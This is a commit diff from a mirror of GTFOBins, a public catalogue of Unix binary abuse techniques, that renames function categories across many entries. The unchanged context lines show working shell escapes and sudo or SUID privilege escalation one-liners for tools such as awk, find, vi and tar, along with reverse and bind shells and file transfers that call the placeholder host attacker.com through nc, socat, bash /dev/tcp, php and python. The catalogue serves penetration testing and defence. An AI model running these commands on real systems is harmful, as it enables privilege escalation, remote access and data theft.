public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2024-10-22 16:48:09 +02:00
Code Issues Projects Releases Wiki Activity

Reorganize function names

Browse Source
This commit is contained in:
Andrea Cardaci 2018-05-25 15:30:02 +02:00
parent 2d3ebbbb05
commit 36dcf7a836
40 changed files with 62 additions and 62 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
_data/functions.yml
View File

@ -1,9 +1,9 @@
exec-interactive:
label: Interactive
execute-interactive:
label: Interactive execute
description: It executes interactive commands that may be exploited to break out from restricted shells.
exec-non-interactive:
label: Non-interactive
execute-non-interactive:
label: Non-interactive execute
description: It executes non-interactive commands that may be exploited to break out from restricted shells.
suid-enabled:
@ -26,18 +26,14 @@ upload:
label: Upload
description: It can exfiltrate files on the network.
bind-shell:
label: Bind shell
bind-shell-interactive:
label: Interactive bind shell
description: It can bind a shell to a local port to allow remote network access.
reverse-shell:
label: Reverse shell
reverse-shell-interactive:
label: Interactive reverse shell
description: It can send back a reverse shell to a listening attacker to open a remote network access.
load-library:
label: Library load
description: It loads shared libraries that may be used to run code in the binary execution context.
bind-shell-non-interactive:
label: Non-interactive bind shell
description: It can bind a non-interactive shell to a local port to allow remote network access.
@ -45,3 +41,7 @@ bind-shell-non-interactive:
reverse-shell-non-interactive:
label: Non-interactive reverse shell
description: It can send back a non-interactive reverse shell to a listening attacker to open a remote network access.
load-library:
label: Library load
description: It loads shared libraries that may be used to run code in the binary execution context.

2
_gtfobins/ash.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: ash
sudo-enabled:
- code: sudo ash

2
_gtfobins/awk.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: awk 'BEGIN {system("/bin/sh")}'
sudo-enabled:
- code: sudo awk 'BEGIN {system("/bin/sh")}'

4
_gtfobins/bash.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: bash
sudo-enabled:
- code: sudo bash
@ -34,7 +34,7 @@ functions:
export RPORT=12345
export LFILE=file_to_get
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
reverse-shell:
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com

2
_gtfobins/csh.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: csh
sudo-enabled:
- code: sudo csh

2
_gtfobins/dash.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: dash
sudo-enabled:
- code: sudo dash

2
_gtfobins/ed.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
ed
!/bin/sh

2
_gtfobins/emacs.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: emacs -Q -nw --eval '(term "/bin/sh")'
sudo-enabled:
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'

2
_gtfobins/env.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: env /bin/sh
sudo-enabled:
- code: sudo env /bin/sh

2
_gtfobins/expect.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: expect -c 'spawn /bin/sh;interact'
sudo-enabled:
- code: sudo expect -c 'spawn /bin/sh;interact'

2
_gtfobins/find.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: find . -exec /bin/sh \; -quit
sudo-enabled:
- code: sudo find . -exec /bin/sh \; -quit

2
_gtfobins/ftp.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
ftp
!/bin/sh

2
_gtfobins/gdb.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: gdb -nx -ex '!sh' -ex quit
sudo-enabled:
- code: sudo gdb -nx -ex '!sh' -ex quit

2
_gtfobins/ionice.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: ionice /bin/sh
sudo-enabled:
- code: sudo ionice /bin/sh

2
_gtfobins/ld.so.md
View File

@ -7,7 +7,7 @@ description: |
/lib64/ld-linux-x86-64.so.2
```
functions:
exec-interactive:
execute-interactive:
- code: /lib/ld.so /bin/sh
sudo-enabled:
- code: sudo /lib/ld.so /bin/sh

2
_gtfobins/less.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
less /etc/profile
!/bin/sh

2
_gtfobins/man.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
man man
!/bin/sh

2
_gtfobins/more.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
TERM= more /etc/profile
!/bin/sh

4
_gtfobins/nc.md
View File

@ -14,13 +14,13 @@ functions:
LPORT=12345
LFILE=where_to_save
nc -l -p $LPORT > "$LFILE"
reverse-shell:
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
nc -e /bin/sh $RHOST $RPORT
bind-shell:
bind-shell-interactive:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
LPORT=12345

6
_gtfobins/node.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
sudo-enabled:
@ -9,7 +9,7 @@ functions:
suid-enabled:
- code: |
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
reverse-shell:
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
@ -20,7 +20,7 @@ functions:
sh.stdout.pipe(this);
sh.stderr.pipe(this);
});'
bind-shell:
bind-shell-interactive:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
export LPORT=12345

4
_gtfobins/perl.md
View File

@ -1,12 +1,12 @@
---
functions:
exec-interactive:
execute-interactive:
- code: perl -e 'exec "/bin/sh";'
sudo-enabled:
- code: sudo perl -e 'exec "/bin/sh";'
suid-enabled:
- code: ./perl -e 'exec "/bin/sh";'
reverse-shell:
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com

4
_gtfobins/php.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-non-interactive:
execute-non-interactive:
- code: |
export CMD="ls /"
php -r 'system(getenv("CMD"));'
@ -39,7 +39,7 @@ functions:
export URL=http://attacker.com/file_to_get
export LFILE=where_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
reverse-shell:
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com

4
_gtfobins/python2.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: python2 -c 'import os; os.system("/bin/sh")'
sudo-enabled:
- code: sudo python2 -c 'import os; os.system("/bin/sh")'
@ -22,7 +22,7 @@ functions:
export URL=http://attacker.com/file_to_get
export LFILE=where_to_save
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
reverse-shell:
reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
code: |
export RHOST=attacker.com

4
_gtfobins/python3.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: python3 -c 'import os; os.system("/bin/sh")'
sudo-enabled:
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
@ -22,7 +22,7 @@ functions:
export URL=http://attacker.com/file_to_get
export LFILE=where_to_save
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
reverse-shell:
reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
code: |
export RHOST=attacker.com

2
_gtfobins/rpm.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
sudo-enabled:
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'

2
_gtfobins/rpmquery.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
sudo-enabled:
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'

4
_gtfobins/ruby.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: ruby -e 'exec "/bin/sh"'
sudo-enabled:
- code: sudo ruby -e 'exec "/bin/sh"'
@ -9,7 +9,7 @@ functions:
code: |
export LPORT=8888
ruby -run -e httpd . -p $LPORT
reverse-shell:
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com

2
_gtfobins/scp.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-non-interactive:
execute-non-interactive:
- code: |
TF=$(mktemp)
CMD="id"

2
_gtfobins/setarch.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: setarch $(arch) /bin/sh
sudo-enabled:
- code: sudo setarch $(arch) /bin/sh

2
_gtfobins/sftp.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
HOST=user@attacker.com
sftp $HOST

4
_gtfobins/socat.md
View File

@ -1,12 +1,12 @@
---
functions:
reverse-shell:
reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
bind-shell:
bind-shell-interactive:
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
code: |
LPORT=12345

2
_gtfobins/ssh.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- description: Reconnecting may help bypassing restricted shells.
code: ssh localhost /bin/bash --noprofile --norc
download:

2
_gtfobins/strace.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: strace -o /dev/null /bin/sh
sudo-enabled:
- code: sudo strace -o /dev/null /bin/sh

2
_gtfobins/tar.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
sudo-enabled:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

2
_gtfobins/taskset.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: taskset 1 /bin/sh
sudo-enabled:
- code: sudo taskset 1 /bin/sh

2
_gtfobins/tclsh.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr

4
_gtfobins/telnet.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
@ -8,7 +8,7 @@ functions:
telnet $RHOST $RPORT
^]
!/bin/sh
reverse-shell:
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com

2
_gtfobins/vi.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: vi -c ':!/bin/sh'
- code: |
vi

2
_gtfobins/wish.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
wish
exec /bin/sh <@stdin >@stdout 2>@stderr

2
_gtfobins/zsh.md
View File

@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: zsh
sudo-enabled:
- code: sudo zsh